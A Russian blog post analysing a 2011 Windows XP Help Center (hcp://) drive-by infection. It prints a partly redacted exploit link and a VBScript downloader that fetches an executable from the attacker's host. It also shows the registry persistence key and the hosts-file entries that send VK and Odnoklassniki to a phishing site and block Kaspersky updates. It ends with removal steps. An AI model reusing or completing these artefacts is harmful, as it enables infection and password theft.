->

понедельник, 1 августа 2011 г.

Антикасперский вирус, или как крадут пароли с одноклассников.

С детских лет меня мучил вопрос: «Как компьютер заражается вирусами». Наконец я узнал, прочувствовал на себе. Почему бы не поведать миру о том, как собственно проходит этот весьма занимательный процесс.
Для того, чтобы не написать пособие по заражению, а то куча народу воспользуется не дай бог, поэтому кое какие куски скриптов я буду удалять.

Уже всем, наверное, поднадоели фразы о «дырявости» MS Windows, но, тем не менее, она остается самой распространенной системой на планете Земля. А может быть, система столь дырява из за своей распространенности.

Вот и сейчас, атака была проведена на одну из уязвимостей системы Windows XP, а именно на Windows Help Center.

Начало как обычно было давно (аж в 2010 году), об этом можно почитать на весьма известном ресурсе xakep.ru (в самом низу страницы).

Началось все просто.

IE выдал запрос на открытие программы, с ресурса tjyre.info. Явно вирус! Но интересно же!!
Переход на сайт http://tjyre.info не дает никакой информации, кроме того, что сайт находится в разработке (на момент выкладывания поста он вобще не работает, видимо прищучили).

Как узнать, что там предназначалось мне на комп? Элементарно – надо рассмотреть, куда ведет ссылка.

Ссылка классического вида (то что «хакер» прописал):
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A ... %%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,…удалено в целях «безопасности»…116,114,46,101,120,101)));</script>

Как подсказывает мне моя безграмотность, ссылка на файл вируса скрыта за цифрами.
Путем несложных преобразований выясняется, что под цифрами скрывается копирование в системную папку моего компьютера скрипта с именем файла l.vbs, и его последующий запуск.

Адрес, по которому в сети размещен скрипт:

http://tjyre.info/games/hcp_vbs.php?f=17
Долго не раздумывая, открываю ссылку, поскольку открытие файла не сервере не всегда то же самое, что и его запуск на компе (рискованый шаг ;) ).
Открывшийся файл содержит текст следующего вида:

«w=3000:x=200:y=1:z=false:a = "http://tjyre.info/u.php?e=7&f=17":Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")):Set f=e.GetSpecialFolder(2):b = f & "\exe.ex2":b=Replace(b,Month("2010-02-16"),"e"):OT = "GET":Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):Set d = CreateObject(StrReverse("maertS.BDODA")) … Удалено из дурацких соображений…  g=o.GetFile(b):g.Delete»

Текстовочка достаточно несложная:
  • видим ссылку, на какую-то страницу,
  • видим дату 16.02.2010 (получается, проводится некоторая маскировка вируса по дате, все таки приняли на вооружение, что маскироваться надо)
  • видим вывернутые на изнанку (при помощи реверса) команды, при помощи которых файл вируса залетает на наш компьютер.
Переходим по ссылке и… Здравствуй родной! Файл с названием readme.exe просит разрешения на посадку.

Благополучно присаживаем свежий readme.exe. Что же несет нам этот гость? Наверняка кучу радости.

Запуск readme.exe был очень удачно заблокирован программой antiwinlocker. За что ей честь и хвала. Но поскольку я все равно хочу посмотреть что получится, то защитников придется попросить удалиться на время.

Первый запуск вируса не был примечателен, что и понятно, вирус проник и затаился до следующей загрузки.

Перезагружаемся и вновь тишина. Загадка!!
Придется искать по тайным углам.
Находим в папке «C:\Documents and Settings\Admin\Application Data» файл lsass.exe (имитирующий системный процесс).
В реестре соответственно обнаруживаем ключик:
"userinit"="C:\\WINDOWS\\system32\\userinit.exe,C:\\Documents and Settings\\Admin\\Application Data\\lsass.exe", что и ожидалось.

Но это еще не всё!
В папке «C:\WINDOWS\system32\drivers\etc» есть волшебный файл hosts, в который вирус дописывает с десяток волшебных строк (просмотрите пожалуйста ВЕСЬ файл hosts):
  • 31.214.145.151 www.vkontakte.ru
  • 31.214.145.151 www.vk.com
  • 31.214.145.151 vkontakte.ru
  • 31.214.145.151 vk.com
  • 31.214.145.151 www.odnoklassniki.ru
  • 31.214.145.151 odnoklassniki.ru
  •  
  • 127.0.0.1 downloads.kaspersky-labs.com
  • 127.0.0.1 downloads0.kaspersky-labs.com
  • ...
  • 127.0.0.1 downloads10.kaspersky-labs.com
  • 127.0.0.1 dnl-geo.kaspersky-labs.com
  • 127.0.0.1 dnl-00.geo.kaspersky.com
  • ...
  • 127.0.0.1 dnl-20.geo.kaspersky.com
При помощи этих строк производится перенаправление с сайтов одноклассники и vkontakte на вполне определенный сайт, а также устраивается полный облом обновлениям касперского (вирус похож на Trojan.Win32.Ddox.ci).
Что мы видим перейдя на сайт злодея? Мы видим главную страницу одноклассников, но если ввести логин и пароль, то они прямиком отправятся к "злодею". А если нажать на какую нибудь ссылку то получаем весьма прикольный запрос на "валидацию аккаунта". Причем в тексте четко сказано: "Услуга недоступна абонентам некоторым регионам Мегафона". Такой серьезный подход к делу, что я не сразу въехал в смысл фразы.
Проверьте сами (http://31.214.145.151/).
У настоящих одноклассников IP совсем другой.


Как с этой фигней бороться.
Для начала, сделать так, как советуют в «хакере» - установить заплатку (или удалить ветку реестра). Цитирую:
  •  Отключить протокол hcp (удалив HKCR\HCP\shell\open) центр помощи.
  • Воспользоваться патчем от Тэвиса (это хакер, нашедший уязвимость) — http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/hcphotfix.zip. Этот патч фиксит бинарник helpctr.exe, делая проверку надежной.
  • Ждать патча от Microsoft.

Далее, необходимо удалить валяющийся в "C:\Documents and Settings\Admin\Application Data» файл lsass.exe. Лучше это сделать загрузившись с внешнего носителя, чтобы загруженный в память процесс не мешал Вам.

Удалить из файла "C:\WINDOWS\system32\drivers\etc\hosts" лишние строки про одноклассников, вконтакте, и касперского.

Исправить в реестре (ветка [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]) 
ключ
"userinit"="C:\\WINDOWS\\system32\\userinit.exe,C:\\Documents and Settings\\Admin\\Application Data\\lsass.exe"
на ключ вот такого вида:
"userinit"="C:\\WINDOWS\\system32\\userinit.exe,"

Проверить компьютер антивирусом с самыми свежими обновлениями.
По касперски это вирус зовется win32.qhost.xmw